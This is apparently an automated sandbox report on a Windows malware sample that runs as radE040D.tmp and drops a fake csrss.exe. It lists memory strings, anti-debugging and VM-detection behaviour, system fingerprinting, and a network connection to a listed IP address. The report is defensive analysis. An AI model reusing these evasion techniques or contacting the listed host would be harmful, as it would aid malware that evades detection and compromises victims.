Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mume
Source: radE040D.tmp, 00000004.00000003.7126538222.0000000003154000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat\S
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7\E
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb\05
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1#\^
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catcat
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff\_
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.17134.1_none_fc7308d7bbb0dfd6.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.17134.1_none_0fa1f97fe68f5a84.manifestK
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\vmswitch.sys.mui1
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.1n
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1bR
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumumm
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum3
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_microsoft-analog-h2-animpkg-baked_31bf3856ad364e35_10.0.17134.1_none_6eba91e284242d6b\amd64_microsoft-deviceproxy-wmiv2-provider_31bf3856ad364e35_10.0.17134.1_none_e9f22d8bf1fc7e92\amd64_microsoft-analog-h2-fxpkg-baked_31bf3856ad364e35_10.0.17134.1_none_1be886b2910c8266\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.1_none_db29adc7273ced52\amd64_microsoft-appmodel-exec-events_31bf3856ad364e35_10.0.17134.1_none_07677813525018a6\amd64_microsoft-composable-sharepicker_31bf3856ad364e35_10.0.17134.1_none_f80e1506497cdc7d\amd64_ialpss2i_i2c_skl.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_980be98350adbd52\amd64_microsoft-antimalware-scan-interface_31bf3856ad364e35_10.0.17134.1_none_3c34e651403e5e41\amd64_microsoft-hostguardianclient-service_31bf3856ad364e35_10.0.17134.1_none_a9eb3231da4732e2\amd64_microsoft-composable-start-binaries_31bf3856ad364e35_10.0.17134.1_none_6e6feff719ed9f5c\amd64_microsoft-composable-sharepicker_31bf3856ad364e35_10.0.17134.112_none_f4554668364f9786\amd64_micros
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064\tcblaunch.exe.mui
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004.manifest
Source: csrss.exe, 00000005.00000002.6845367603.00000000038C6000.00000004.sdmp, csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmpBinary or memory string: Hyper-V.psd1
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c.manifestc
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7062337228.0000000003122000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb\?
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144\I
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7126538222.0000000003154000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catj
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vdev-offline_31bf3856ad364e35_10.0.17134.1_none_c190bdf9d967faea.manifest$
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catat~]+
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80.manifest
Source: radE040D.tmp, 00000004.00000002.8062573216.0000000003FBE000.00000004.sdmpBinary or memory string: VirtualMachineOrg
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5.manifest
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumtm
Source: csrss.exe, 00000008.00000002.6858402624.00000000038A1000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\wow64_microsoft.powershel..nfigurationprovider_31bf3856ad364e35_10.0.17134.1_none_e941b7edca5175f1\DscCoreConfProv.dll.mflC:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.17134.1_none_9cb6bf37d3c2efb9\Hyper-V.Types.ps1xmlofofC:\Windows\WinSxS\wow64_microsoft-xbox-auth..er-client-component_31bf3856ad364e35_10.0.17134.1_none_e46ec0a48473e18a\XblAuthTokenBrokerExt.dllC:\Windows\WinSxS\wow64_microsoft.ink_31bf3856ad364e35_10.0.17134.165_none_72e17ece2adbc1ab\Microsoft.Ink.dll1\MSFT_ServiceResource.schema.mof
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177\
Source: radE040D.tmp, 00000004.00000003.7129876000.00000000040CD000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat4.1
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat*
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.17134.1
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a\\\
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum.mumR
Source: radE040D.tmp, 00000004.00000003.7062337228.0000000003122000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat0
Source: radE040D.tmp, 00000004.00000003.6881799014.00000000039D1000.00000004.sdmpBinary or memory string: $$_syswow64_windowspowershell_v1.0_modules_hyper-v_2.0.0.0_e405d34891a93e8b.cdf-mss
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumC
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565.manifestfest
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7130819819.000000000316B000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b\20\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\b84
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catK
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5\>
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_705250041d8b5452.manifest
Source: radE040D.tmp, 00000004.00000002.8062573216.0000000003FBE000.00000004.sdmpBinary or memory string: Y\VirtualMachineOrg
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb\amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b\amd64_microsoft-hyper-v-m..-clie
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\{
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63\
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1t
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\o
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catTTQ
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumum
Source: radE040D.tmp, 00000004.00000003.7126538222.0000000003154000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catM
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat34.1
Source: radE040D.tmp, 00000004.00000003.7062143699.0000000003105000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0\
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catriver.ia
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.48_none_d4ed173f61801406\
Source: radE040D.tmp, 00000004.00000003.6848755317.0000000003A66000.00000004.sdmpBinary or memory string: crosoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_9c1fa24ea8808bce.manifest
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpAPI call chain: ExitProcess graph end nodegraph_4-49062
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\wscript.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004195BA rdtsc 5_1_004195BA
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0054FAAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0054FAAD
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP4_2_0041A13C
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005664B0 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,CreateWaitableTimerA,SetWaitableTimer,WaitForMultipleObjects,CloseHandle,Sleep,CloseHandle,TlsGetValue,ResetEvent,__CxxThrowException@8,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_005664B0
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00550F9A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00550F9A
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0054FAAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0054FAAD
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0054FAAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0054FAAD
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_0054DB9A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0054DB9A
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpMemory protected: page no access | page read and write | page execute | page execute and write copy | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 208.113.155.199 80Jump to behavior
Contains functionality to launch a program with higher privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004078E6 Wow64DisableWow64FsRedirection,GetForegroundWindow,ShellExecuteW,Wow64RevertWow64FsRedirection,4_2_004078E6
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\radE040D.tmp C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmpBinary or memory string: Program Manager
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmpBinary or memory string: Progman
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: GetLocaleInfoA,4_2_0055F513
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00573480 cpuid 4_2_00573480
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0054E1CE GetSystemTimeAsFileTime,__aulldiv,4_2_0054E1CE
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004176EB _memset,GetUserNameW,4_2_004176EB
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language